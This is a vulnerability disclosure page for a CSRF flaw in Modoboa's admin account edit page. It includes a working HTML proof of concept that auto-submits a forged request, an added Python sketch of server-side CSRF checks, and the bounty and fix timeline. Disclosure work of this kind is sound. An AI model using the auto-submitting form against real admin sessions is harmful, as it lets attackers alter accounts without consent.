CSRF leading to edit admin accounts in modoboa/modoboa

Valid

Reported on

Feb 26th 2023


Description

GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.

Proof of Concept

Log in as admin, then try to edit an admin account (example: id=4) by opening the following file in the browser.

<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://demo.modoboa.org/admin/accounts/4/edit/">
      <input type="hidden" name="active_tab" value="default" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

An attacker could force an authenticated admin to edit and update admin accounts.
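As an added example (not Modoboa's code, and not the actual fix shipped in commit 5d886f), the following constructed Python model shows the three server-side checks that would stop the cross-site GET in the PoC above: refusing state changes on safe methods, verifying the request origin against a trusted origin, and requiring a per-session synchronizer token. The origin value, the token field name (borrowed from Django's csrfmiddlewaretoken) and the request dictionaries are all assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed model of the edit endpoint; Modoboa's real implementation differs.
# The PoC drives a cross-site GET to /admin/accounts/4/edit/?active_tab=default.
TRUSTED_ORIGIN = "https://demo.modoboa.org"  # assumed deployment origin
TOKEN_FIELD = "csrfmiddlewaretoken"          # Django's conventional field name


def new_csrf_token() -> str:
    """Per-session secret the server stores and embeds in its own forms."""
    return secrets.token_urlsafe(32)


def edit_allowed(method: str, headers: dict, session_csrf_token: str,
                 form: dict) -> tuple[bool, str]:
    """Decide whether an account-edit request may mutate state.

    Accept only when all of the following hold:
      1. the method is not a safe one (GET/HEAD/OPTIONS carry no side effects);
      2. Origin (or Referer as a fallback) matches the trusted origin;
      3. the form carries the token stored in the victim's session.
    Returns (allowed, reason) so callers can log the rejection cause.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return False, "safe method must not mutate state"

    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    parsed = urlparse(origin)
    if f"{parsed.scheme}://{parsed.netloc}" != TRUSTED_ORIGIN:
        return False, f"untrusted origin {origin}"

    submitted = form.get(TOKEN_FIELD, "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(submitted, session_csrf_token):
        return False, "bad or missing CSRF token"
    return True, "ok"


def poc_request() -> tuple[str, dict, dict]:
    """The request the PoC page above produces (constructed headers)."""
    return ("GET", {"Referer": "https://attacker.example/poc.html"},
            {"active_tab": "default"})
```

Running `edit_allowed(*poc_request(), session_csrf_token=...)` rejects the PoC at the first check, while a same-origin POST carrying the session token is the only shape that passes.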

We are processing your report and will contact the modoboa team within 24 hours. 2 months ago
Antoine Nguyen validated this vulnerability 2 months ago
memmedrehimzade has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
memmedrehimzade
2 months ago

Researcher


Can you assign a CVE please?

memmedrehimzade
2 months ago

Researcher


any update?

memmedrehimzade
a month ago

Researcher


@admin

Ben Harvie
21 days ago

Admin


The maintainer has the power to assign a CVE during the fix and publish stages.

Antoine Nguyen marked this as fixed in 2.1.0 with commit 5d886f 20 days ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability 20 days ago